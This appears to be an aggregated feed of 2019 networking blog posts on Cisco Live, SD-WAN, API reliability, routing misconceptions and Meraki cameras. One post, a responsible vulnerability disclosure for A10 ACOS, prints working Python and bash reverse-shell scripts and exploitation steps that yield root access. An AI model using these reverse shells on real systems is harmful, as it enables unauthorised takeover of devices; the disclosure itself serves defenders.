June 25, 2019

ipSpace.net Blog (Ivan Pepelnjak)

We Are on a Break ;)

It’s high time for another summer break (I get closer and closer to burnout every year - either I’m working too hard or I’m getting older ;).

Of course we’ll do our best to reply to support (and sales ;) requests, but it might take us a bit longer than usual. I will publish an occasional worth reading or watch out blog post, but don’t expect anything deeply technical for the new two months.

We’ll be back (hopefully refreshed and with tons of new content) in early September, starting with network automation course on September 3rd and VMware NSX workshop on September 10th.

In the meantime, try to get away from work (hint: automating stuff sometimes helps ;), turn off the Internet, and enjoy a few days in your favorite spot with your loved ones!

by Ivan Pepelnjak (noreply@blogger.com) at June 25, 2019 02:34 PM

June 24, 2019

Honest Networker

Leaking your “optimized” routes to stub networks that then leak it to a Tier1 transit that doesn’t filter.

ezgif.com-video-to-gif (5)

<script async="async" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>

by ohseuch4aeji4xar at June 24, 2019 02:17 PM

ipSpace.net Blog (Ivan Pepelnjak)

First-hand Feedback: ipSpace.net Network Automation Course

Daniel Teycheney attended the Spring 2019 Building Network Automation Solutions online course and sent me this feedback after completing it (and creating some interesting real-life solutions on the way):


I spent a bit of time the other day reflecting on how much I’ve learn’t from the course in terms of technical skills and the amount I’ve learned has been great. I literally no idea about things like Git, Jinja2, CI testing, reading YAML files and had only briefly seen Ansible before.

I’m not an expert now, but I understand these things and have real practical experience on these subjects which has given me great confidence to push on and keep getting better.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 24, 2019 02:14 PM

XKCD Comics

June 22, 2019

The Networking Nerd

Cisco Live 2019 – Rededicating Community

The 2019 Cisco Live Sign Photo

Another Cisco Live is in the books for me. I was a bit shocked to realize this was my 14th event in a row. I’ve been going to Cisco Live half of the time it’s been around! This year was back in San Diego, which has good and bad points. I’d like to discuss a few of them there and get the thoughts of the community.

Good: The Social Media Hub Has Been Freed! – After last year’s issues with the Social Media Hub being locked behind the World of Solutions, someone at Cisco woke up and realized that social people don’t keep the same hours as the show floor people. So, the Hub was located in a breezeway between the Sails Pavilion and the rest of the convention center. And it was great. People congregated. Couches were used. Discussions were had. And the community was able to come together again. Not during the hours when it was convenient. But a long time. This picture of the big meeting on Thursday just solidifies in my mind why the Social Media Hub has to be in a common area:

You don’t get this kind of interaction anywhere else!

Good: Community Leaders Step Forward – Not gonna lie. I feel disconnected sometimes. My job at Tech Field Day takes me away from the action. I spend more time in special sessions than I do in the social media hub. For any other place that could spell disaster. But not for Cisco Live. When the community needs a leader, someone steps forward to fill the role. This year, I was happy to see my good friend Denise Fishburne filling that role. The session above was filled with people paying rapt attention to Fish’s stories and her bringing people into the community. She’s a master at this kind of interaction. I was even proud to sit on the edge and watch her work her craft.

Fish is the d’Artagnan of the group. She may be part of the Musketeers of Social Media but Fish is undoubtedly the leader. A community should hope to have a leader that is as passionate and involved as she is, especially given her prominent role in Cisco. I feel like she can be the director of what the people in the Social Media Hub need. And I’m happy to call her my friend.

Bad: Passes Still Suck – You don’t have to do the math to figure out that $700 is bigger than $200. And that $600/night is worse than $200/night. And yet, for some reason we find ourselves in San Diego, where the Gaslamp hotels are beyond insane, wondering what exactly we’re getting with our $700 event pass. Sessions? Nope. Lunch? Well, sort of. Access to the show floor? Only when it’s open for the random times during the week. Compelling content? That’s the most subjective piece of all. And yet Cisco is still trying to tell us that the idea of a $200 social-only pass doesn’t make sense.

Fine. I get it. Cisco wants to keep the budgets for Cisco Live high. They got the Foo Fighters after all, right? They also don’t have to worry about policing the snacks and food everywhere. Or at least not ordering the lowest line items on the menu. Which means less fussing about piddly things inside the convention center. And for the next two years it’s going to work out just great in Las Vegas. Because Vegas is affordable with the right setup. People are already booking rooms at the surrounding hotels. You can stay at the Luxor or the Excalibur for nothing. But if the pass situation is still $700 (or more) in a couple of years you’re going to see a lot of people dropping out. Because….

Bad: WTF?!? San Francisco?!? – I’ve covered this before. My distaste for Moscone is documented. I thought we were going to avoid it this time around. And yet, I found out we’re going back to SF in 2022.

WHY?!?!?!?

Moscone isn’t any bigger. We didn’t magically find seating for 10,000 extra people. More importantly, the hotel situation in San Fran is worse than ever before. You seriously can’t find a good room this year for VMworld. People are paying upwards of $500/night for a non-air conditioned shoe box! And why would you do this to yourself Cisco?

Sure, it’s cheap. Your employees don’t need hotel rooms. You can truck everything up. But your costs savings are being passed along to the customer. Because you would rather them pay through the nose instead of footing the bill yourself. And Moscone still won’t hold the whole conference. We’ll be spilled over into 8 different hotels and walking from who knows where to get to the slightly nicer shack of a convention center.

I’m not saying that Cisco Live needs to be in Vegas every year. But it’s time for Cisco to start understanding that their conference needs a real convention center. And Moscone ain’t it.

Better: Going Back to Orlando – As you can see above, I’ve edited this post to include new information about Cisco Live 2022. I have been informed by multiple people, including internal Cisco folks, that Live 2022 is going to Orlando and not SF. My original discussion about Cisco Live in SF came from other sources with no hard confirmation. I believe now it was floated as a trial balloon to see how the community would respond. Which means all my statements above still stand regarding SF. Now it just means that there’s a different date attached to it.

Orlando is a better town for conventions than SF. It’s on-par with San Diego with the benefit that hotels are way cheaper for people because of the large amount of tourism. I think it’s time that Cisco did some serious soul searching to find a new venue that isn’t in California or Florida for Cisco Live. Because if all we’re going to do is bounce back and forth between San Diego and Orlando and Vegas over and over again, maybe it’s time to just move Cisco Live to Vegas and be done with the moving.


Tom’s Take

Cisco Live is something important to me. It has been for years, especially with the community that’s been created. There’s nothing like it anywhere else. Sure, there have been some questionable decisions and changes here and there. But the community survives because it rededicates itself every year to being about the people. I wasn’t kidding when I tweeted this:

<script async="async" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>

Because the real heart of the community is each and every one of the people that get on a plane and make the choice time and again to be a part of something special. That kind of dedication makes us all better in every possible way.

by networkingnerd at June 22, 2019 05:12 PM

June 21, 2019

My Etherealmind

Musing: HPE Cloudless Is A Good Marketing Joke

HPE announced a marketing campaign built around the idea of Cloudless. I see this as a superb bit of trolling as the cloudista faithful have been delightfully duped into talking about HPE and highlighting how narrow minded they are. Most of them don’t even realise just how hard they are being rick-rolled here. Its bloody […]

The post Musing: HPE Cloudless Is A Good Marketing Joke appeared first on EtherealMind.

by Greg Ferro at June 21, 2019 06:48 PM

ipSpace.net Blog (Ivan Pepelnjak)

Device Configuration Synthesis with NetComplete on Software Gone Wild

When I was still at university the fourth-generation programming languages were all the hype, prompting us to make jokes along the lines “fifth generation will implement do what I don’t know how

The research team working in Networked Systems Group at ETH Zurich headed by prof. Laurent Vanbever got pretty close. The description of their tool says:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 21, 2019 06:30 AM

XKCD Comics

June 20, 2019

My Etherealmind

Helium – Venture Capital Con Job or Viable Business ?

The company 'Helium' appears to be attempting to build a national Low Power WAN (LPWAN) carrier network by asking normal people to buy and operate network nodes for them. The hotspot may be purchased directly or bundled with 3rd party IOT products and become nodes in a proprietary LPWAN that mines tokens in a blockchain.

The post Helium – Venture Capital Con Job or Viable Business ? appeared first on EtherealMind.

by Greg Ferro at June 20, 2019 03:30 PM

Moving Packets

Cranky Old Network Engineer Complains About The Youth Of Today

If you’re very old (like me) you’ll likely remember the halcyon days when IP routing was not enabled by default on Cisco routers. Younger gamers may find this hard to believe, which makes it even stranger when I keep bumping into an apparently common misconception about how routers work. Let’s take a look at what I’m beefing about.

No IP Routing?

To put this in context for the younger gamers, it’s worth noting that at the time, a typical “enterprise” might be running IP, but was equally likely to run IPX, AppleTalk, DECnet or some other protocol which may – or may not – support routing. Yes, there was life before the Internet Protocol became ubiquitous. If you’re curious, the command to enable IP routing is, well:

ip routing

Guess how IPX routing was enabled:

ipx routing

Appletalk?

appletalk routing

DECnet Phase IV?

decnet [network-number] routing &lt;decnet-address>

Ok, so the pattern isn’t entirely consistent, but it’s close enough. In one way things are much simpler now because routers tend to handle IP (and IPv6) and nothing else. On the other hand there are so many more IP-related features available, I think we should just be grateful that there’s only one underlying protocol to worry about.

Let’s Connect!

Assuming that a router has IP routing enabled by default, here’s my gripe. Consider this simple network topology:

<figure class="wp-block-image"><figcaption>Totally High Quality Network Diagram</figcaption></figure>

The image shows a router with two connected subnets, each of which connected to a switch with a PC connected to it. The PCs each have an IP address on their respective networks, and a default gateway pointing to the router interface. I’ve used this diagram to ask a variety of simple interview questions over the last ten years or so, and as part of that I’ve asked a number of candidates to consider the scenario where PC-A cannot ping PC-B, and to describe troubleshooting steps that might be taken to determine the cause.

On a number of those occasions, a candidate has said they would check the routing table on R1. When asked to explain what they would be looking for, the candidate explains that perhaps the router didn’t have a route for one side or the other, so they’d check that it had routes. “What kind of routes?” you might ask (and I did). The candidates would then explain that there needed to be either static routing or dynamic routing on the router. Some are hesitant on the dynamic routing part, but all who go down this path explain the need for a static route to each of the attached subnets.

I really struggle to understand this. I have wondered whether it’s something inherited from the linux world, where a netstat -rn or route shows the subnet seemingly pointing to an interface, e.g.:

$ netstat -rn
Kernel IP routing table
Destination  Gateway    Genmask         Flags  Iface
10.1.1.0     0.0.0.0    255.255.255.0   U      eth0  &lt;---
0.0.0.0      10.1.1.1   0.0.0.0         UG     eth0

What’s interesting is that most candidates can also explain how Cisco’s administrative distance (AD) is used, and cite some common values, for example:

AD | Protocol
---+----------
 0 | Connected
 1 | Static

The candidates are typically clear that where multiple routes exist for a destination, the route with the lower AD will be selected. They’re also clear that an attached interface counts as “Connected”. The fact that a connected route would override the proposed static route doesn’t seem to process, or at least it does not until the conflict is pointed out at which point it’s like their understanding of the whole world was just turned upside down.

Origins of Confusion?

If this were something presented only by a very occasional candidate, I’d say it was just one of those things, but this misunderstanding has been offered up so many times over the years, I have begun to feel a little bit sorry for the candidates, because clearly somebody is out there spreading misinformation which they unfortunately have accepted in the absence of anything to contradict it.

Book Smarts

Part of this problem, I suspect, is book learning. Ask a candidate to state AD values for a list of protocols, and it’s like looking the information up in a mental table, and the answer will be rattled off with confidence. Ask how AD works or what it does, and the candidate can give a textbook definition of administrative distance on Cisco routers. This is what I can probably best define as “book smarts.” We’ve all been there; we had to learn a product or protocol without the ability at that time to be hands on, so we’ve learned all about something in theory, but have never used it in practice.

I’ve been a Grumpy Old Man about this before, and if you go to that post, jump to the heading “Rote Memorization” to get my views on it. Does Feynman’s story sound familiar? This problem is in part due to the way many vendor tests are structured, favoring trivia over actual understanding, and I can’t really blame the candidates for memorizing in this manner when that’s what will let them pass the trivia test.

Nonetheless, for the sake of my sanity, please let’s be clear that a router – with IP routing enabled – will by default route packets between its connected interfaces without help from static or dynamic routes. Yes there are some exceptions I can think of (usually revolving around same-interface routing), but in this simple scenario, this is how it is.

My 0x10 Bits

I really have wondered if there’s a CCENT-type textbook doing the rounds out there which tells the students that they need static routes for connected subnets; it seems strange that so many candidates seem to have had the same bad hallucination about how routers work. Perhaps a disgruntled student created the Free Study Guide equivalent of Monty Python’s Hungarian Phrase Book?

As for the inability to apply what has been learned, it’s possible that this is a result of a lack of practical experience and an excess of test cramming. However, unlike when I was young, optimistic and trying to learn networking, virtualized network devices are now readily available for use, so there’s little excuse for up and coming network engineers not to get some time and experience at the command line.

Or will the next generation only know how to point and click? That’s probably a topic for another rant.

If you liked this post, please do click through to the source at Cranky Old Network Engineer Complains About The Youth Of Today and give me a share/like. Thank you!

by John Herbert at June 20, 2019 01:44 PM

ipSpace.net Blog (Ivan Pepelnjak)

Impact of Controller Failures in Software-Defined Networks

Christoph Jaggi sent me this observation during one of our SD-WAN discussions:

The centralized controller is another shortcoming of SD-WAN that hasn’t been really addressed yet. In a global WAN it can and does happen that a region might be cut off due to a cut cable or an attack. Without connection to the central SD-WAN controller the part that is cut off cannot even communicate within itself as there is no control plane…

A controller (or management/provisioning) system is obviously the central point of failure in any network, but we have to go beyond that and ask a simple question: “What happens when the controller cluster fails and/or when nodes lose connectivity to the controller?”

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 20, 2019 11:08 AM

June 19, 2019

My Etherealmind

The Un Glamour of Business Travel

Originally Published in the Human Infrastructure Magazine Issue 113 in May 2019 I’m in New York, USA. I should be taking photos of myself in front of landmarks, having amazing food and laughing as I walk down the the street. In reality, I’m sitting in front of a mirror that is screwed to the wall […]

The post The Un Glamour of Business Travel appeared first on EtherealMind.

by Greg Ferro at June 19, 2019 03:23 PM

ipSpace.net Blog (Ivan Pepelnjak)

Real-Life SD-WAN Experience

SD-WAN is the best thing that could have happened to networking according to some industry “thought leaders” and $vendor marketers… but it seems there might be a tiny little gap between their rosy picture and reality.

This is what I got from someone blessed with hands-on SD-WAN experience:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 19, 2019 10:58 AM

XKCD Comics

June 18, 2019

Networking Now (Juniper Blog)

Juniper Connected Security: On Defending a Multicloud Environment

Effective information security requires gaining visibility into potential threats and preventing the spread of malicious activity when it occurs. In a multicloud environment, it is easy to lose viability due to lack of control over the underlying infrastructure. Defending those same multicloud environments can be resource intensive, as maintaining consistent security policies across multiple infrastructures is complicated. Juniper Connected Security can help.

by Trevor_Pott at June 18, 2019 04:43 PM

Moving Packets

The Achilles Heel of the API

I’ve been developing yet more automation recently, and I’ve been hitting two major stumbling blocks that have had a negative impact on my ability to complete the tooling.

API Documentation

When APIs were first made available, the documentation from many vendors was simply incomplete; it seemed that the documentation team was always a release or two behind the people implementing the API. To fix that, a number of vendors have moved to a self-documenting API system along the lines of Swagger. The theory is that if you build an API endpoint, you’re automatically building the documentation for it at the same time, which is a super idea. This has improved the API’s endpoint coverage but in some cases has resulted in thorough documentation explaining what the endpoints are, but little to no documentation explaining why one would choose to use a particular endpoint. 

As a result, with one API in particular I have been losing my mind trying to understand which endpoint I should use to accomplish a particular task, when no less than three of them appear to handle the same thing. I’m then left using trial and error to determine the correct path, and at the end of it I determine which one to use, but don’t really know why.

Broken APIs

There are few better ways to waste an afternoon than to have an API endpoint which you call correctly per the documentation, but the call fails for some other reason. The worst one I’ve encountered recently is an HTTP REST API call which returns a HTTP 400 error (implying that the problem is in the request I sent) but with a JSON error message in the returned content saying there was an internal error on the back end. Surely an internal server error should be in the 5xx series? That particular error is caused by a bug which prevents that API call working correctly when the device is deployed in a cluster. This is infuriating, and took a long time to track down and confirm as a bug rather than an error on my part.

Unfortunately this discovery also suggests that as part of the software validation process before code release, either the API is not being fully tested (it has incomplete test coverage) and/or the API is not being tested against devices which are clustered, which, for this device, I’d suggest represents the majority of implementations.

Trust But Verify

Worse, in some ways, than that are the endpoints which return a valid-looking result and a success code, but are not necessarily providing what was requested. I’ve learned the hard way that just because an API tells you that a request was successful, it’s still necessary during development to manually inspect the returned data to make sure that the API is behaving itself and providing what it claims.

For example, I am working with one API where a request for the FIB (Forwarding Information Base) returns lots of entries. However, closer inspection of those entries reveals that only the first of any ECMP next-hops is being returned; it’s not possible to see all calculated equal cost paths. As a second irritation, the entire FIB cannot be retrieved at once; after much trial and error I determined that it is necessary to page the result in blocks of around 30-35 entries, or the request eventually triggers an internal error and fails. Naturally, the documentation does not indicate that there is any kind of limit on how many FIB entries can be returned safely at one time, nor that there would be an issue with a larger FIB being returned. 

Worse, retrieving the RIB (Routing Information Base) from the same API – which thankfully does include the ECMP routes I’m looking for – only returns the first ~60 entries, and ignores any pagination requests entirely, so it’s not possible to see anything but those 60 entries. Again, looking manually allowed me to confirm that although I had asked for entries 90-129, for example, I was still getting the first 60 RIB entries. If I had not looked carefully, I could have made some very bad decisions on the basis of those incomplete data. 

If the “show ip route” (or similar) command didn’t work properly in the CLI of a network device, customers would lose their minds, and I am pretty certain that a patched version of code would become available almost immediately. When the API doesn’t work, I get shrugs and promises of a fix in a future release at some unspecified time.

My 2 Bits

APIs have got big and unwieldy, and that’s partly our fault as users, because – reasonably enough – we want them to allow us to do everything the device can do. The APIs take a lot more effort on the part of the vendors to document and the end result seems to be that in some cases at least, the quality and value of that documentation has decreased even while coverage of endpoint availability and capabilities have increased. Making those APIs usable and understandable is key for developers but also in order to retain customers, because if I can’t figure out how to do something or I lose faith in the API’s reliability on one product, there’s a danger I’ll move to a different product.

As an industry we expect to be able to control everything via an API, and we are automating our business processes based on those APIs. Broken API endpoints mean broken business processes and that’s just not acceptable. I’m also getting a little tired of waiting for one bug to be fixed in a code release, then discovering another API bug and having to repeat the cycle, never quite finding a version of code that I can safely deploy and automate.

APIs have to be functional and reliable or they’re useless. APIs need to be thoroughly tested before shipping code to customers. Perhaps vendors can consider how they might be able to patch bugs in the API in a more agile fashion so that issues can perhaps be fixed without requiring a full code upgrade on a device, which has a high cost to the business. Unfortunately the API seems frequently to be tightly bound to the operating system rather than abstracted safely away from it, which means this will largely remain a dream rather than an actuality.

Most importantly, APIs need to be a first class citizen in the operation of every device, not a “table stakes” feature wedged uncomfortably and unreliably into legacy code.

Featured image by Charles 🇵🇭 on Unsplash

If you liked this post, please do click through to the source at The Achilles Heel of the API and give me a share/like. Thank you!

by John Herbert at June 18, 2019 01:51 PM

My Etherealmind

Why I Do Not Use Underscores in DNS, A ‘War’ Story.

My ‘do not use underscores in DNS’ war story: Back in the day when NetBIOS name services (NBNS) mattered more than DNS, people would put names on the their machines so they could access the shared resources from the Windows finder. Developers and certain types of ‘security professionals’ who have opinions on underscores vs dashes […]

The post Why I Do Not Use Underscores in DNS, A ‘War’ Story. appeared first on EtherealMind.

by Greg Ferro at June 18, 2019 10:06 AM

ipSpace.net Blog (Ivan Pepelnjak)

Read Network Device Information with REST API and Store It Into a Database

One of my readers sent me this question:

How can I learn more about reading REST API information from network devices and storing the data into tables?

Long story short: it’s like learning how to drive (well) - you have to master multiple seemingly-unrelated tasks to get the job done.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 18, 2019 06:07 AM

June 17, 2019

ipSpace.net Blog (Ivan Pepelnjak)

How Microsoft Azure Orchestration System Crashed My Demos

One of the first things I realized when I started my Azure journey was that the Azure orchestration system is incredibly slow. For example, it takes almost 40 seconds to display six routes from per-VNIC routing table. Imagine trying to troubleshoot a problem and having to cope with 30-second delay on every single SHOW command. Cisco IGS/R was faster than that.

If you’re old enough you might remember working with VT100 terminals (or an equivalent) connected to 300 baud modems… where typing too fast risked getting the output out-of-sync resulting in painful screen repaints (here’s an exercise for the youngsters: how long does it take to redraw an 80x24 character screen over a 300 bps connection?). That’s exactly how I felt using Azure CLI - the slow responses I was getting were severely hampering my productivity.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 17, 2019 07:04 AM

XKCD Comics

June 14, 2019

My Etherealmind

Why Cisco is Not A Networking Company Anymore

I wanted to put down some evidence on why Cisco is more than a networking company.

I consider this useful information for people who are planning their careers and particularly those peopel who are investing in certification programs. Its my view that Cisco has outgrown networking.

The post Why Cisco is Not A Networking Company Anymore appeared first on EtherealMind.

by Greg Ferro at June 14, 2019 12:09 PM

Honest Networker
Potaroo blog

Looking for What's Not There

DNSSEC is often viewed as a solution looking for a problem. It seems only logical that there is some intrinsic value in being able to explicitly verify the veracity and currency of responses received from DNS queries, yet fleshing this proposition out with practical examples has proved challenging. Where else might DNSSEC be useful?

June 14, 2019 06:00 AM

ipSpace.net Blog (Ivan Pepelnjak)

Feedback: Ansible for Networking Engineers

I always love to hear from networking engineers who managed to start their network automation journey. Here’s what one of them wrote after watching Ansible for Networking Engineers webinar (part of paid ipSpace.net subscription, also available as an online course).

This webinar helped me a lot in understanding Ansible and the benefits we can gain. It is a big area to grasp for a non-coder and this webinar was exactly what I needed to get started (in a lab), including a lot of tips and tricks and how to think. It was more fun than I expected so started with Python just to get a better grasp of programing and Jinja.

In early 2019 we made the webinar even better with a series of live sessions covering new features added to recent Ansible releases, from core features (loops) to networking plugins and new declarative intent modules.

by Ivan Pepelnjak (noreply@blogger.com) at June 14, 2019 05:59 AM

XKCD Comics

June 13, 2019

Moving Packets

A10 Networks ACOS Root Privilege Escalation

The following summarizes a root privilege escalation vulnerability that I identified in A10 ACOS ADC software. This was disclosed to A10 Networks in June 2016 and mitigations have been put in place to limit exposure to the vulnerability.

<figure class="aligncenter">A10 Networks Cookie Vulnerability</figure>

SUMMARY OF VULNERABILITY

Any user assigned sufficient privilege to upload an external health monitor (i.e a script) and reference it from a health monitor can gain root shell access to ACOS.

At this point, I respectfully acknowledge Raymond Chen’s wise words about being on the other side of an airtight hatch; if the malicious user is already a system administrator or has broad permissions, then one could argue that they could already do huge damage to the ADC in other ways. However, root access could allow that user to install persistent backdoors or monitoring threats in the underlying OS where other users can neither see nor access them. It could also allow a partition-level administrator to escalate effectively to a global admin, by way of being able to see the files in every partition on the ADC.

SOFTWARE VERSIONS TESTED:

This vulnerability was originally discovered and validated initially in ACOS 2.7.2-P4-SP2 and is present in 4.x as well.

VULNERABLE VERSIONS

This behavior has been core to external health monitor scripts, so it can be reasonably stated that this vulnerability exists in:

  • ACOS 2.7.2 initial release and tested up to 2.7.2-P14 inclusive
  • ACOS 4.0 initial release up to 4.1.4-GR1-P1 inclusive

WORKAROUNDS

2.7.2: Use Role Based Access Control to map users to a Role which does not include External Health Monitor privileges.
4.1.1-P10 onwards: Ensure that administrators do not have the new “HM” privilege unless absolutely necessary.

FIXED IN

The underlying vulnerability for this privilege escalation has not been fixed, so a user with health monitor rights can still gain a root shell as of 2.7.2-P14 and 4.1.4-GR1-P1.

However, the following mitigations were rolled out place as of v4.1.1-P10:

  • External HM privileges have been removed from the default ReadWriteAdmin role;
  • A new “ReadWriteHM” privilege has been created, which is effectively one level above ReadWrite privilege, and allows administration of External HMs;
  • External HM privilege can no longer be granted to Partition admins, only to global admins.
<figure class="wp-block-image">External Health Monitor Privilege: Release notes</figure>

Ideally the health monitors would not be running as root and it would perhaps be wise to run them in a chrooted environment. However, given the extent of code rewriting that this would incur, and the fact that this is an admin privilege escalation rather than a guest->root escalation, I believe that these changes are appropriate and see them as good steps to protect against nefarious administrators.

AUTHOR / DISCOVERER

John Herbert (http://movingpackets.net)

Vulnerability Details

Custom health monitors can be created in ACOS in the form of “external health monitors”, i.e. scripts that are uploaded by the user to perform a non-standard health check and return an up or down status by way of exit code. Supported languages for such health checks include Bourne Shell, BASH and Python 2.7. Scripts can be uploaded by users who have been granted the appropriate configuration-level permissions (including users whose write permissions are limited to their own partition), after which the script can be used as the health check method within a health monitor configuration.

Unfortunately, uploaded scripts are stored and executed with uid/gid 0 (root), so it is trivial to trigger a reverse shell to a listening system which will have root privilege on the A10 load balancer.

Exploitation

Exploiting this vulnerability is simple. First, create a simple “reverse shell” script. Examples are given here in bash and in python, in both cases triggered from within a bash script:

Python:

#!/bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LISTENER_IP>”,<LISTENER_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
exit 0

BASH:

#!/bin/bash
bash -i >& /dev/tcp/<LISTENER_IP>/<LISTENER_PORT> 0>&1 &
exit 0

Both of the examples above will trigger a backgrounded process that will initiate a TCP connection to <LISTENER_IP> on port <LISTENER_PORT>. To put this into effect, follow these simple steps:

  1. Create an external health monitor on the A10, and populate it with one of the scripts above.
  2. Create a health monitor that references the external health monitor script. It is necessary to have sufficient privilege – at a minimum within a partition – to upload the script and create a health monitor, so this is definitely a privilege escalation rather than a full external hack.
  3. Set up a listener on a device accessible to the ACOS management port. In this case, using netcat: nc -l 5555
  4. Trigger the script.

Triggering the script can be done in one of two ways, depending on the platform:

Apply the Health Monitor to an object

Both 2.7.x and 4.x code allows a health monitor to be applied to an object. At its simplest, create a server object and use the new health monitor:

slb server innocent_looking_server 1.2.3.4
health monitor root_shell_hm
!

Test the Health Monitor (2.7.x only)

ACOS v2.7.x offers a way to manually test a health monitor against a server. The destination IP to test does not matter, as our health monitor isn’t going to be trying to contact it. In the CLI:

health-test 1.2.3.4 monitorname root_shell_hm

Once the HM has been applied to an object or the test has been manually triggered, the A10 should establish a connection back to the target machine on the specified port. The netcat listener should now look something like this:

$nc -l 5555
sh: no job control in this shell
sh-4.2#

Now to validate that we have root:

sh-4.2#id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#

Observations Regarding Impact

It is already possible (with a few intermediate steps) to mount a vThunder (a virtual A10 ADC) disk image in linux and freely browse the content, so the information within the A10 OS is arguably already exposed and editable in offline circumstances; but then, who has disk images from their production A10 systems lying around? That notwithstanding, this privilege escalation allows root access to a live production system, and could also allow a partition admin to view configuration data from partitions which the attacker is not entitled to access.

Recommendation

  • Only grant external health monitor (EHM) access to administrators when absolutely needed, using Roles (v2.7.2) or the new ReadWriteHM privilege (v4.1.1-P10 onwards)
  • Audit external health monitor scripts periodically
  • ACOS 4.1 users running ACOS 4.1.1-P9 or earlier should upgrade to 4.1.1-P10 or later

If you liked this post, please do click through to the source at A10 Networks ACOS Root Privilege Escalation and give me a share/like. Thank you!

by John Herbert at June 13, 2019 07:50 AM

ipSpace.net Blog (Ivan Pepelnjak)

Running OSPF in a Single Non-Backbone Area

One of my subscribers sent me an interesting puzzle:

>One of my colleagues configured a single-area OSPF process in a customer VRF customer, but instead of using area 0, he used area 123 nssa. Obviously it works, but I was thinking: “What the heck, a single OSPF area MUST be in Area 0

Not really. OSPF behaves identically within an area (modulo stub/NSSA behavior) regardless of the area number…

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 13, 2019 05:42 AM

June 12, 2019

ShortestPathFirst

Interview with Katherine Dollar, Creative Marketing Storyteller and Communications Strategist

In this interview, I sit down with Katherine Dollar, a brilliant Creative Marketing Storyteller and Communications Strategist at Moxie Blue Media. We discuss the role of storytelling in marketing campaigns and speaking engagements and why this method of relaying information resonates in a way that creates a better connection with the audience and further helps …

by Stefan Fouant at June 12, 2019 07:02 PM

Moving Packets

Meraki In The Middle – Smart Security Cameras

<figure class="wp-block-image"></figure>

I’ve been looking at security cameras recently, in part because my home owners association needs to upgrade the system which monitors some of the amenities. We want motion detection features and, obviously, remote access to view live cameras and recorded footage without having to go to the location. Unfortunately there’s a gap in the market which seems to be exactly where I’m looking. Cisco Meraki may have just stepped in and bridged that gap.

The Problem Space

Low-End Products

Over the last few years, a wide variety of small security cameras have become available, any of which which at first glance would appear suitable. These include products like Netgear’s Arlo, Amazon’s Blink, Google’s Nest Cam and more. After some brief testing, however, I’m a little less convinced that they are what we’re looking for. It sounds silly to say it, because it’s not like this is something they hide, but these products are all aimed at the home user market. Dashboard logins are single user, based on an email address and the web interfaces may not work well for much more than five or so cameras. The camera choices are fairly limited, and as they’ll be streaming their feeds over WiFi to the cloud, it’ll be important to have good, fast wireless coverage and enough internet bandwidth to sustain all the streams in parallel, something which scales progressively less well as the number of cameras increases. On the up side, all of the solutions have a mobile app available.

High-End Products

Commercial camera offerings, in contrast, tend to revolve around a vast range of expensive cameras which are hard wired (usually to the network, as IP cameras are the most common option now). The recorded footage is stored on an on-premises Digital Video Recorder (DVR) and there will be a desktop application available to access it.

Meraki In The Middle

Somewhere in the middle of the products above we find Meraki, who is selling what appear to be some really neat security cameras. From what I can see, the Meraki cameras in fact lean towards the high end in terms of quality, but Meraki has brought with it the same underlying cloud-managed simplicity with which it has approached wireless, switching and security. To be clear, Meraki has been selling its “MV” security cameras for a while, but with the second generation models it has significantly upped its game, and it is these cameras I am discussing. The second generation cameras have model numbers which end in the number two (2), e.g. MV-32.

How is Meraki Different?

Local Storage

The second generation MV cameras are unusual in that they are built using a mobile-grade Qualcomm Snapdragon processor, so there is a lot of processing power embedded within the camera unit; far more than typical security cameras. The processor is partnered with 256GB of solid state storage which is used to store raw video and image metadata. This is probably the biggest differentiator between the MV cameras and almost every other camera out there; there is no network DVR or NVR (Network Video Recorder) needed, and no constant stream of video data being sent to the cloud, because each camera independently stores its recorded footage locally. This also means that even if the network goes down, footage is still being recorded so long as the device has power. When the user wants to view footage, it is retrieved (by the Meraki dashboard) from the camera as needed.

Each camera does, however, generate a network stream of about 50Kbps to the internet, containing metadata to be stored on the Meraki servers for use by the dashboard.

Movement Triggered Footage Retention

In order to save storage, it’s normal to only store security video footage when movement was detected in the frame. This is typically implemented by keeping the most recent 10-20 seconds of video buffered at all times, and when movement is detected, that buffer is written to storage followed by the live footage that follows it (usually stopping after a fixed period of time). This is an effective mechanism but it’s not unusual to miss events because the movement on screen was not big enough to trigger recording, and thus that footage was electronically thrown away.

Meraki has approached this problem in an ingenious way. The MV cameras store all video footage for a configurable number of days, while storing the movement triggers as metadata. After that, video that was not marked with a movement trigger is deleted, leaving behind only the movement-triggered video. This allows a few days for the user to look into any footage from those days before being limited to detected movement.

12v PoE Puck

For installations where the Meraki cameras are replacing existing cameras which have 12/24v power lines (but no Ethernet) run to them, Meraki sell a small ‘puck’, a low voltage power adaptor, which converts 12/24v DC to Power Over Ethernet (PoE) to power the camera. Thankfully the cameras also have 802.11ac wireless built in, so the lack of wired connectivity isn’t such a problem, and apart from the 50Kbps metadata stream, video is only sent over the wireless network when the video is requested.

Local Image Analysis

The Snapdragon processor built in to the second generation cameras allows the MV series to perform image analysis on-device, including motion detection and person identification. The cameras can also generate motion heat maps, which can be useful in public / commercial environments in order to identify patterns of movement.

Stop Motion Images

When viewing a motion trigger event, the system can automatically overlay a series of images showing the moving item entering the trigger zone and leaving it, in a series of steps. Thus if a person triggers the motion sensing, the dashboard will show multiple images of that person (with small gaps between them as the person moves) all overlaid into a single picture. It it hard to describe, but it presents an immediate and effective overview of the movement event without having to scroll back and forward in the video.

Search By Movement in a Zone

Select an area of the camera’s fields of view, and the Meraki can search for any movement triggers found in that area. This is an incredibly fast way to find very specific movement. Imagine that a purse has been stolen; if we know where the purse was, a motion search could be run looking for any movement at that location, significantly speeding up the process of finding the correct event.

More to Come

